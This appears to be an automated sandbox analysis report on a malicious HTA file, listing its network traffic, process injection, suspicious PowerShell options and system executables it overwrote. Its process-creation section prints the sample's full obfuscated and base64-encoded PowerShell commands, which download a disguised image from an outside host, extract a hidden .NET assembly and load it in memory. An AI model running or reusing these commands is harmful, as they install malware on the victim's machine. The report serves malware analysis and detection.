send Nov. 28, 2023, 9:48 a.m.	buffer: FBAm¤ùN#òl5$©§PíÃU"¥f»þÚ-+²äKLX%Àõ:ùç]?ô RCÅª$¯>BÅ0cæÐE\íY½£niH+Ò4Gâß×ÐÃMèy« ×Ó- ÞÚ¼a)_ socket: 1224 sent: 134	1	134
WSASend Nov. 28, 2023, 9:49 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 1812		0

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PShOMe[4]+$pSHome[34]+'X') ( (('{1}ima'+'geUrl = {0}https://uploaddeimagens.com.br/images/004/667/608/o'+'riginal/hta.jpg?1700268840{0};{1}webClient = New-Object System.Net.WebClient;{1}imag'+'eBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding]::UTF8.GetString({1}imageBy'+'tes);{1}startFlag = {0}<'+'<BASE64_STA'+'RT>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += '+'{1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}ba'+'se64Command = {1}im'+'ageText'+'.'+'Substring({1}startIndex, {1}base64Le'+'ngth);{1}'+'c'+'ommandBytes = [S'+'yste'+'m.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]::Load({1}commandBytes);{1}type = {1}loadedAssembly.GetType({0}Fiber.Home{0});{1}method = {1}type.GetMethod({0}VAI{0}).Invoke({1}null, [object[]] ({0}dHh0LmtjaXBodG'+'9vdC8wMzEuODQyLjI5LjE5Ly86cHR0aA=={0} , {0}dfdfd{0'+'} , {0}dfdf{0} , {0}d'+'fdf{0} , {0'+'}dadsa{0} , {0}de{0} , {0}cu{0}))') -F [cHAR]39,[cHAR]36))"
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8ATQBlAFsANABdACsAJABwAFMASABvAG0AZQBbADMANABdACsAJwBYACcAKQAgACgAIAAoACgAJwB7ADEAfQBpAG0AYQAnACsAJwBnAGUAVQByAGwAIAA9ACAAewAwAH0AaAB0AHQAcABzADoALwAvAHUAcABsAG8AYQBkAGQAZQBpAG0AYQBnAGUAbgBzAC4AYwBvAG0ALgBiAHIALwBpAG0AYQBnAGUAcwAvADAAMAA0AC8ANgA2ADcALwA2ADAAOAAvAG8AJwArACcAcgBpAGcAaQBuAGEAbAAvAGgAdABhAC4AagBwAGcAPwAxADcAMAAwADIANgA4ADgANAAwAHsAMAB9ADsAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AHsAMQB9AGkAbQBhAGcAJwArACcAZQBCAHkAdABlAHMAIAA9ACAAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAHsAMQB9AGkAbQBhAGcAZQBVAHIAJwArACcAbAApADsAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAewAxAH0AaQBtAGEAZwBlAEIAeQAnACsAJwB0AGUAcwApADsAewAxAH0AcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAewAwAH0APAAnACsAJwA8AEIAQQBTAEUANgA0AF8AUwBUAEEAJwArACcAUgBUAD4APgB7ADAAfQA7AHsAMQB9AGUAbgBkAEYAbABhAGcAIAA9ACAAewAwAH0APAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AHsAMAB9ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAB7ADEAfQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwApADsAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAHsAMQB9AGUAbgBkAEYAbABhAGcAKQA7AHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACcAKwAnAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwB7ADEAfQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAB7ADEAfQBlAG4AZABJAG4AZABlAHgAIAAtACAAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AHsAMQB9AGIAYQAnACsAJwBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAewAxAH0AaQBtACcAKwAnAGEAZwBlAFQAZQB4AHQAJwArACcALgAnACsAJwBTAHUAYgBzAHQAcgBpAG4AZwAoAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgALAAgAHsAMQB9AGIAYQBzAGUANgA0AEwAZQAnACsAJwBuAGcAdABoACkAOwB7ADEAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAJwArACcAeQBzAHQAZQAnACsAJwBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAewAxAH0AbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAB7ADEAfQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAewAxAH0AdAB5AHAAZQAgAD0AIAB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAewAwAH0ARgBpAGIAZQByAC4ASABvAG0AZQB7ADAAfQApADsAewAxAH0AbQBlAHQAaABvAGQAIAA9ACAAewAxAH0AdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAewAwAH0AVgBBAEkAewAwAH0AKQAuAEkAbgB2AG8AawBlACgAewAxAH0AbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAewAwAH0AZABIAGgAMABMAG0AdABqAGEAWABCAG8AZABHACcAKwAnADkAdgBkAEMAOAB3AE0AegBFAHUATwBEAFEAeQBMAGoASQA1AEwAagBFADUATAB5ADgANgBjAEgAUgAwAGEAQQA9AD0AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAAnACsAJwB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZAAnACsAJwBmAGQAZgB7ADAAfQAgACwAIAB7ADAAJwArACcAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACkAJwApACAALQBGACAAIABbAGMASABBAFIAXQAzADkALABbAGMASABBAFIAXQAzADYAKQApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
parent_process	iexplore.exe	martian_process	powershell -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8ATQBlAFsANABdACsAJABwAFMASABvAG0AZQBbADMANABdACsAJwBYACcAKQAgACgAIAAoACgAJwB7ADEAfQBpAG0AYQAnACsAJwBnAGUAVQByAGwAIAA9ACAAewAwAH0AaAB0AHQAcABzADoALwAvAHUAcABsAG8AYQBkAGQAZQBpAG0AYQBnAGUAbgBzAC4AYwBvAG0ALgBiAHIALwBpAG0AYQBnAGUAcwAvADAAMAA0AC8ANgA2ADcALwA2ADAAOAAvAG8AJwArACcAcgBpAGcAaQBuAGEAbAAvAGgAdABhAC4AagBwAGcAPwAxADcAMAAwADIANgA4ADgANAAwAHsAMAB9ADsAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AHsAMQB9AGkAbQBhAGcAJwArACcAZQBCAHkAdABlAHMAIAA9ACAAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAHsAMQB9AGkAbQBhAGcAZQBVAHIAJwArACcAbAApADsAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAewAxAH0AaQBtAGEAZwBlAEIAeQAnACsAJwB0AGUAcwApADsAewAxAH0AcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAewAwAH0APAAnACsAJwA8AEIAQQBTAEUANgA0AF8AUwBUAEEAJwArACcAUgBUAD4APgB7ADAAfQA7AHsAMQB9AGUAbgBkAEYAbABhAGcAIAA9ACAAewAwAH0APAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AHsAMAB9ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAB7ADEAfQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwApADsAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAHsAMQB9AGUAbgBkAEYAbABhAGcAKQA7AHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACcAKwAnAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwB7ADEAfQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAB7ADEAfQBlAG4AZABJAG4AZABlAHgAIAAtACAAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AHsAMQB9AGIAYQAnACsAJwBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAewAxAH0AaQBtACcAKwAnAGEAZwBlAFQAZQB4AHQAJwArACcALgAnACsAJwBTAHUAYgBzAHQAcgBpAG4AZwAoAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgALAAgAHsAMQB9AGIAYQBzAGUANgA0AEwAZQAnACsAJwBuAGcAdABoACkAOwB7ADEAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAJwArACcAeQBzAHQAZQAnACsAJwBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAewAxAH0AbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAB7ADEAfQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAewAxAH0AdAB5AHAAZQAgAD0AIAB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAewAwAH0ARgBpAGIAZQByAC4ASABvAG0AZQB7ADAAfQApADsAewAxAH0AbQBlAHQAaABvAGQAIAA9ACAAewAxAH0AdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAewAwAH0AVgBBAEkAewAwAH0AKQAuAEkAbgB2AG8AawBlACgAewAxAH0AbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAewAwAH0AZABIAGgAMABMAG0AdABqAGEAWABCAG8AZABHACcAKwAnADkAdgBkAEMAOAB3AE0AegBFAHUATwBEAFEAeQBMAGoASQA1AEwAagBFADUATAB5ADgANgBjAEgAUgAwAGEAQQA9AD0AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAAnACsAJwB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZAAnACsAJwBmAGQAZgB7ADAAfQAgACwAIAB7ADAAJwArACcAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACkAJwApACAALQBGACAAIABbAGMASABBAFIAXQAzADkALABbAGMASABBAFIAXQAzADYAKQApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2172 resumed a thread in remote process 2260
NtResumeThread Nov. 28, 2023, 9:54 a.m.	thread_handle: 0x0000000000000368 suspend_count: 1 process_identifier: 2260	1	0	0

Creates a suspicious Powershell process (9 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File_HTA.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All